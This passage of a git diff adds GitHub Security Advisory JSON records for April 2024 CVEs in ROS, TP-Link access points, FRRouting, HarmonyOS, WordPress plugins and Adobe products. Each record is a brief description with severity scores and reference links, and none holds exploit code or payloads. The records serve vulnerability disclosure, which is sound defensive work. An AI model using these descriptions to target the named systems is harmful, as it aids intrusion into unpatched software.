"GHSA-h3j9-9865-w4pw", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30672" + ], + "details": "Arbitrary file upload vulnerability in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via the file upload component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30672" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30672" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T08:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h3v7-q8j4-9rw9/GHSA-h3v7-q8j4-9rw9.json b/advisories/unreviewed/2024/04/GHSA-h3v7-q8j4-9rw9/GHSA-h3v7-q8j4-9rw9.json new file mode 100644 index 00000000000..28a6e8f7f2b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h3v7-q8j4-9rw9/GHSA-h3v7-q8j4-9rw9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h3v7-q8j4-9rw9", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49910" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `ssid` parameter at offset `0x42247c` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49910" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h458-4c82-j96q/GHSA-h458-4c82-j96q.json b/advisories/unreviewed/2024/04/GHSA-h458-4c82-j96q/GHSA-h458-4c82-j96q.json new file mode 100644 index 00000000000..c4270a1fc04 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h458-4c82-j96q/GHSA-h458-4c82-j96q.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h458-4c82-j96q", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52539" + ], + "details": "Permission verification vulnerability in the Settings module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52539" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h4c3-x7vv-8q28/GHSA-h4c3-x7vv-8q28.json b/advisories/unreviewed/2024/04/GHSA-h4c3-x7vv-8q28/GHSA-h4c3-x7vv-8q28.json new file mode 100644 index 00000000000..fa6909ec2ed --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h4c3-x7vv-8q28/GHSA-h4c3-x7vv-8q28.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4c3-x7vv-8q28", + "modified": "2024-04-07T21:30:28Z", + "published": "2024-04-07T21:30:28Z", + "aliases": [ + "CVE-2024-31951" + ], + "details": "In the Opaque LSA Extended Link parser in FRRouting (FRR) through 9.1, there can be a buffer overflow and daemon crash in ospf_te_parse_ext_link for OSPF LSA packets during an attempt to read Segment Routing Adjacency SID subTLVs (lengths are not validated).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31951" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15674" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15674/commits/344fb4be2bc27316c74b17003c05ea40be395836" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h4mw-pww9-9c5r/GHSA-h4mw-pww9-9c5r.json b/advisories/unreviewed/2024/04/GHSA-h4mw-pww9-9c5r/GHSA-h4mw-pww9-9c5r.json new file mode 100644 index 00000000000..f6267338d86 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h4mw-pww9-9c5r/GHSA-h4mw-pww9-9c5r.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4mw-pww9-9c5r", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52549" + ], + "details": "Vulnerability of data verification errors in the kernel module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52549" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h574-gj9q-j8mx/GHSA-h574-gj9q-j8mx.json b/advisories/unreviewed/2024/04/GHSA-h574-gj9q-j8mx/GHSA-h574-gj9q-j8mx.json new file mode 100644 index 00000000000..6d2f5c85972 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h574-gj9q-j8mx/GHSA-h574-gj9q-j8mx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h574-gj9q-j8mx", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29745" + ], + "details": "there is a possible Information Disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29745" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-908" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h5r4-2c2f-fx7f/GHSA-h5r4-2c2f-fx7f.json b/advisories/unreviewed/2024/04/GHSA-h5r4-2c2f-fx7f/GHSA-h5r4-2c2f-fx7f.json new file mode 100644 index 00000000000..65647bc7a4b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h5r4-2c2f-fx7f/GHSA-h5r4-2c2f-fx7f.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5r4-2c2f-fx7f", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2536" + ], + "details": "The Rank Math SEO with AI SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HowTo block attributes in all versions up to, and including, 1.0.214 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2536" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3055515/seo-by-rank-math/tags/1.0.215/includes/modules/schema/blocks/toc/assets/src/utils.js?old=2959806&old_path=seo-by-rank-math/trunk/includes/modules/schema/blocks/toc/assets/src/utils.js" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/81a82caf-4013-42c4-ad63-4e13bfa4322f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h63r-7v46-7432/GHSA-h63r-7v46-7432.json b/advisories/unreviewed/2024/04/GHSA-h63r-7v46-7432/GHSA-h63r-7v46-7432.json new file mode 100644 index 00000000000..0ac9805543d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h63r-7v46-7432/GHSA-h63r-7v46-7432.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h63r-7v46-7432", + "modified": "2024-04-08T09:31:13Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2023-52554" + ], + "details": "Permission control vulnerability in the Bluetooth module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52554" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h66x-39x2-5rv8/GHSA-h66x-39x2-5rv8.json b/advisories/unreviewed/2024/04/GHSA-h66x-39x2-5rv8/GHSA-h66x-39x2-5rv8.json new file mode 100644 index 00000000000..dafdfc1d97e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h66x-39x2-5rv8/GHSA-h66x-39x2-5rv8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h66x-39x2-5rv8", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20670" + ], + "details": "Outlook for Windows Spoofing Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20670" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h6c4-wr98-9px9/GHSA-h6c4-wr98-9px9.json b/advisories/unreviewed/2024/04/GHSA-h6c4-wr98-9px9/GHSA-h6c4-wr98-9px9.json new file mode 100644 index 00000000000..d3d73f7d41b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h6c4-wr98-9px9/GHSA-h6c4-wr98-9px9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6c4-wr98-9px9", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30666" + ], + "details": "A buffer overflow vulnerability has been discovered in the C++ components of ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code via improper handling of arrays or strings within these components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30666" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30666" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h6cc-4vmm-cxpp/GHSA-h6cc-4vmm-cxpp.json b/advisories/unreviewed/2024/04/GHSA-h6cc-4vmm-cxpp/GHSA-h6cc-4vmm-cxpp.json new file mode 100644 index 00000000000..6290c5877ab --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h6cc-4vmm-cxpp/GHSA-h6cc-4vmm-cxpp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6cc-4vmm-cxpp", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2336" + ], + "details": "The Popup Maker – Popup for opt-ins, lead gen, & more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.18.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2336" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3053244%40popup-maker%2Ftrunk&old=2989642%40popup-maker%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40e1215c-ac00-4fd6-b428-a57cef95aed1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h72f-rgrp-ff8g/GHSA-h72f-rgrp-ff8g.json b/advisories/unreviewed/2024/04/GHSA-h72f-rgrp-ff8g/GHSA-h72f-rgrp-ff8g.json new file mode 100644 index 00000000000..dd5f3443e36 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h72f-rgrp-ff8g/GHSA-h72f-rgrp-ff8g.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h72f-rgrp-ff8g", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-3438" + ], + "details": "A vulnerability was found in SourceCodester Prison Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /Admin/login.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259691.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3438" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemSQL1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259691" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259691" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312203" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T11:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h88v-572r-gvxx/GHSA-h88v-572r-gvxx.json b/advisories/unreviewed/2024/04/GHSA-h88v-572r-gvxx/GHSA-h88v-572r-gvxx.json new file mode 100644 index 00000000000..fe601f7ab6b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h88v-572r-gvxx/GHSA-h88v-572r-gvxx.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h88v-572r-gvxx", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1498" + ], + "details": "The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Photo Stack Widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1498" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.2/widgets/photo-stack/widget.php#L598" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044937%40happy-elementor-addons%2Ftrunk&old=3042474%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f43e1eed-09f8-44b3-b6fa-d0344f331dd7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h896-g8fr-jxm5/GHSA-h896-g8fr-jxm5.json b/advisories/unreviewed/2024/04/GHSA-h896-g8fr-jxm5/GHSA-h896-g8fr-jxm5.json new file mode 100644 index 00000000000..73342e3a294 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h896-g8fr-jxm5/GHSA-h896-g8fr-jxm5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h896-g8fr-jxm5", + "modified": "2024-04-06T03:30:26Z", + "published": "2024-04-06T03:30:26Z", + "aliases": [ + "CVE-2024-1994" + ], + "details": "The Image Watermark plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the watermark_action_ajax() function in all versions up to, and including, 1.7.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to apply and remove watermarks from images.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1994" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3064501%40image-watermark&new=3064501%40image-watermark&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/31a66e30-972b-4a7b-9d47-ad7abd574e36?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h8hv-7w37-m54g/GHSA-h8hv-7w37-m54g.json b/advisories/unreviewed/2024/04/GHSA-h8hv-7w37-m54g/GHSA-h8hv-7w37-m54g.json new file mode 100644 index 00000000000..557ce1d6ed3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h8hv-7w37-m54g/GHSA-h8hv-7w37-m54g.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8hv-7w37-m54g", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2024-30416" + ], + "details": "Use After Free (UAF) vulnerability in the underlying driver module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30416" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h8j8-56g9-735m/GHSA-h8j8-56g9-735m.json b/advisories/unreviewed/2024/04/GHSA-h8j8-56g9-735m/GHSA-h8j8-56g9-735m.json new file mode 100644 index 00000000000..9bf212762e5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h8j8-56g9-735m/GHSA-h8j8-56g9-735m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h8j8-56g9-735m", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31817" + ], + "details": "In TOTOLINK EX200 V4.0.3c.7646_B20201211, an attacker can obtain sensitive information without authorization through the function getSysStatusCfg.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31817" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Leak_getSysStatusCfg/Leak.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h939-p6c6-9fwj/GHSA-h939-p6c6-9fwj.json b/advisories/unreviewed/2024/04/GHSA-h939-p6c6-9fwj/GHSA-h939-p6c6-9fwj.json new file mode 100644 index 00000000000..5f3ad62b166 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h939-p6c6-9fwj/GHSA-h939-p6c6-9fwj.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h939-p6c6-9fwj", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30736" + ], + "details": "An insecure deserialization vulnerability has been identified in ROS Kinetic Kame in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code and obtain sensitive information via the Data Serialization and Deserialization Components, Inter-Process Communication Mechanisms, and Network Communication Interfaces.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30736" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30736" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-h95w-mc8p-wm53/GHSA-h95w-mc8p-wm53.json b/advisories/unreviewed/2024/04/GHSA-h95w-mc8p-wm53/GHSA-h95w-mc8p-wm53.json new file mode 100644 index 00000000000..a461b51aff1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-h95w-mc8p-wm53/GHSA-h95w-mc8p-wm53.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h95w-mc8p-wm53", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26084" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26084" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hcfm-v43m-qw33/GHSA-hcfm-v43m-qw33.json b/advisories/unreviewed/2024/04/GHSA-hcfm-v43m-qw33/GHSA-hcfm-v43m-qw33.json new file mode 100644 index 00000000000..e35de8d0dd9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hcfm-v43m-qw33/GHSA-hcfm-v43m-qw33.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcfm-v43m-qw33", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20770" + ], + "details": "Photoshop Desktop versions 24.7.2, 25.3.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20770" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/photoshop/apsb24-16.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T13:51:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hf6h-cv6q-2jpq/GHSA-hf6h-cv6q-2jpq.json b/advisories/unreviewed/2024/04/GHSA-hf6h-cv6q-2jpq/GHSA-hf6h-cv6q-2jpq.json new file mode 100644 index 00000000000..1739ae51e10 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hf6h-cv6q-2jpq/GHSA-hf6h-cv6q-2jpq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hf6h-cv6q-2jpq", + "modified": "2024-04-09T09:31:10Z", + "published": "2024-04-09T09:31:10Z", + "aliases": [ + "CVE-2024-30696" + ], + "details": "OS command injection vulnerability in ROS2 Galactic Geochelone in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the command processing or system call components in ROS2, including External Command Execution Modules, System Call Handlers, and Interface Scripts.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30696" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30696" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-hh28-wc7c-m2r4/GHSA-hh28-wc7c-m2r4.json b/advisories/unreviewed/2024/04/GHSA-hh28-wc7c-m2r4/GHSA-hh28-wc7c-m2r4.json new file mode 100644 index 00000000000..4f1728fb4a8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-hh28-wc7c-m2r4/GHSA-hh28-wc7c-m2r4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hh28-wc7c-m2r4", + "modified": "2024-04-10T15:30:40Z", + "published": 